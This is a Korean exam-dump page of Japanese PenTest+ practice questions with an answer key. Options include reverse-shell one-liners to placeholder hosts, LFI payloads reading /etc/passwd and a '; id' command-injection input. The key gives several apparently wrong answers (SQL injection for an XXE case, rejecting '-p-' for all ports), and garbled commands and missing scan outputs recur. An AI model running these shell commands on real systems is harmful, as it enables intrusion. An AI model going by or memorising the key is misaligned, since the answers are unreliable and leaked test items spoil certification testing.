최신 PT0-001日本語 무료덤프 - CompTIA PenTest+ Certification Exam (PT0-001日本語版)

문제1

ペネトレーションテスターは、Webサービスを評価する必要があります。スコーピングフェーズ中にテスターが要求する必要があるのは次のうちどれですか？

A. 営業時間外の連絡先エスカレーション

B. SOAPプロジェクトファイル

C. XSD

D. WSDLファイル

정답: D

문제2

ペネトレーションテスタは、ポート443を介して任意のホストに無制限のネットワークを持つシステムを危険にさらします。侵入テスト担当者は、被害者から攻撃者に戻るためのリバースシェルを作成しようとしています。侵入テスト担当者は、次の方法のうちどれを使用するのが好きですか？

A. perl -e 'use SOCKET'; $ i = '<SOURCEIP>; $ p = 443;

B. nc -e / bin / sh <SOURCEIP> 443

C. bash -i>＆/ dev / tcp / <DESTINATIONIP> / 443 0>＆1

D. ssh superadmin @ <DESTINATIONIP> -p 443

정답: A

설명: (DumpTOP 회원만 볼 수 있음)

문제3

ペネトレーションテスターは、クライアントのWebフォームのセキュリティを評価しており、フィールドの1つに「; id」と入力します。
ペネトレーションテスターは、次の応答を観察します。

回答に基づいて、次の脆弱性のどれが存在しますか？

A. XSS / XSRF

B. セッションハイジャック

C. SQLインジェクション

D. コマンドインジェクション

정답: D

문제4

WebサーバーはPHPを実行しており、侵入テスターはLFIを使用して、URLを介してパラメーターを渡すことでコマンドを実行しています。これが可能なのは、サーバーログがPHPシステム（）関数を実行するためにポイズニングされたためです。次のうちどれがpasswdファイルの内容を取得しますか？

A. ''&CMD_cat /etc/passwd--&id-34''

B. ''&system(CMD) ''cat /etc/passed&id=34''

C. ''&CMD=cat ../../../../etc/passwd7id=34'

D. ''&CMD=cat / etc/passwd%&id= 34''

정답: A

문제5

Webアプリケーションの悪用フェーズ中に、侵入テスターは、サーバーに送信されるパラメーターを処理するためにXMLファイルが使用されていることを検出します。次の脆弱性のうち、Webプロキシを使用して影響を受けるWebサーバーの内部ファイルにアクセスしようとするために悪用される可能性があるのはどれですか？

A. XSS

B. XXE

C. SQLインジェクション

D. CSRF

정답: C

문제6

NDAの目的は次のうちどれですか。

A. ネットワークの詳細構成の概要

B. テストが許可されるシステムの境界の概要

C. 許可されている技術テストの要件の概要

D. 両当事者間の機密保持の条件の概要

정답: D

문제7

ペネトレーションテスターは、ターゲットに対してNmapスキャンを実行し、次の出力を受け取りました。

ペネトレーションテスターがNEXTを実行して弱点や脆弱性を発見するのに最適なコマンドは次のうちどれですか？

A. snmpwalk -c public 192.168.121.1

B. medusa -h 192.168.121.1 -U users.txt -P passwords.txt -M ssh

C. enum4linux -w 192.168.121.1

D. onesixtyone -d 192.168.121.1

정답: A

문제8

ペネトレーションテスターは、NACが有効になっているネットワークを検出しました。NACをバイパスするために使用できるコマンドは次のうちどれですか。

A. sslbump

B. iptafcles

C. マッチェンジャー

정답: C

설명: (DumpTOP 회원만 볼 수 있음)

문제9

侵入テスト担当者は、システムに「ゴースト」の脆弱性が存在するかどうかを手動で確認したいと考えています。脆弱性を検証する正しい方法は次のうちどれですか？

A. Download the GHOST file to a Linux system and compile
gcc -o GHOST GHOST.c
test i:
./GHOST

B. Download the GHOST file to a Windows system and compile
gcc -o GHOST GHOST.c
test i:
./GHOST

C. Download the GHOST file to a Windows system and compile
gcc -o GHOST
test i:
./GHOST

D. Download the GHOST file to a Linux system and compile
gcc -o GHOST
test i:
./GHOST

정답: A

문제10

クライアントへの侵入テストの販売価格を計算するとき、理解するのに最も重要な側面は次のうちどれですか？

A. 秘密保持契約

B. 必要な作業範囲

C. クライアントの予算

D. 運用コスト

정답: B

문제11

侵入テスト担当者がスタートアップ企業のセキュリティ評価を実施しました。このレポートには合計10件の脆弱性が掲載されており、そのうち5件が緊急と判断されています。クライアントには、すべての脆弱性をただちに修復するためのリソースがありません。そのような状況下で、クライアントのための最もよい提案はどれでしょうか？

A. 最初に重大な脆弱性の修正による影響が最も少ないものを実装し、次に他の重大な脆弱性に対処する

B. 他の脆弱性の修正に時間がかかる可能性がある場合でも、最も重要な脆弱性を最初に修正します。

C. 重大な脆弱性に対して簡単な補償管理を適用してリスクを最小限に抑え、その後修復を優先順位を付け直します。

D. 最も早く修復できる問題を特定し、最初にそれらに対処します。

정답: B

문제12

A社の20.10.10.0/24のネットワークとmail.companyA.comに対して侵入テストを実施するために、侵入テスト会社が雇われました。侵入テスト会社が情報収集段階にある間に、mail.companyA.comのIPアドレスが20.15.1.2に解決され、会社Bに属していることが発見されました。
mail.companyA.comに対して侵入テストを実施するための最良の解決策は次のうちどれですか？

A. 侵入テスターは、mail.companyA.comに対してテストを実施する許可を与える署名されたステートメントをA社に要求する必要があります。

B. 侵入テスターは、公に入手可能な情報を利用してmail.companyA.comを分析するパッシブオープンソースインテリジェンス収集方法のみを使用する必要があります。

C. 侵入テスターはmail.companyA.comのテストを無視し、ネットワーク範囲20.10.10.0/24のみを完了する必要があります。

D. ドメイン名がスコープ内にあるため、侵入テスターはmail.companyA.comに対して侵入テストを実行する必要があります。

정답: B

문제13

侵入テスト担当者が、コンピュータで次のNmapスキャンを実行しました。
nmap-aV 192.168.1.5
組織はそれが環境からTelnetを無効にしたと言いました。ただし、Nmapスキャンの結果では、SSHに対してポート22がクローズ、ポート23がオープンと表示されています。次のうちどれが起こったことのための最良の説明ですか？

A. Nmap results contain a false positive for port 23.

B. Port 22 was filtered.

C. The service is running on a non-standard port.

D. The organization failed to disable Telnet.

정답: D

문제14

ペネトレーションテスタがワイヤレススニファからの次の出力を確認しています。

次のうちどれが上記の情報から推定することができますか？

A. ユーザー名

B. キーの強さ

C. チャネル干渉

D. ハードウェアベンダ

정답: A

문제15

定数は、識別されたデバイス上のすべてのTCPポットをスキャンしたいと考えています。次のNmapスイッチのどれがこのタスクを完了しますか？

A. -p-

B. -ポート1-65534

C. -p ALX、

D. -p 1-65534

정답: D

문제16

侵入テスターは、侵害されたシステムにインストールされたシェルを報告する必要があります。次のうちどれが理由ですか？

A. 別のセキュリティコンサルタントがシェルにアクセスできるようにするため

B. 開発者が脆弱性のトラブルシューティングを行えるようにするため

C. システム管理者がWAFにルールを記述できるようにするため

D. システム管理者がクリーンアップを実行できるようにするため

정답: B

문제17

ログを確認しているときに、Web開発者はフィールドに次のユーザー入力文字列があることに気付きます。

次のタイプの攻撃のうち、Webサイトに対して行われたものはどれですか？

A. 反映されたXSS

B. 永続的なXSS

C. XSSインジェクション

D. ブラインドXSS

정답: C

문제18

enum4linuxを使用してActiveDirectoryドメインコントローラー上のユーザーを正常に列挙した後、侵入テスターはパスワード推測攻撃を実行したいと考えています。以下の出力が与えられます。

攻撃を行う前に、上記の出力からユーザー名を抽出するために使用できるのは次のうちどれですか？

A. grep -i rid v <enura.41inux_output。txt '| cut -d：-S2 i cut -d] -f1>ユーザー名。txt

B. grep user enuza41inux_output.txt I awk '{print $ 1}' | cut -d [-S2 I cut -d] -f1> username.txt

C. cat enum41inux_output.txt> grep -v user I sed's / \ [// 'I sed's / \] //' 2> usernames.txt

D. cut -d：-f2 enum41inux_output.txt | awk '{print S2}'私は-dをカットしました：-f1> usernaraes.txt

정답: B

최신 PT0-001日本語 무료덤프 - CompTIA PenTest+ Certification Exam (PT0-001日本語版)

우리와 연락하기

유용한 링크

최신 업데이트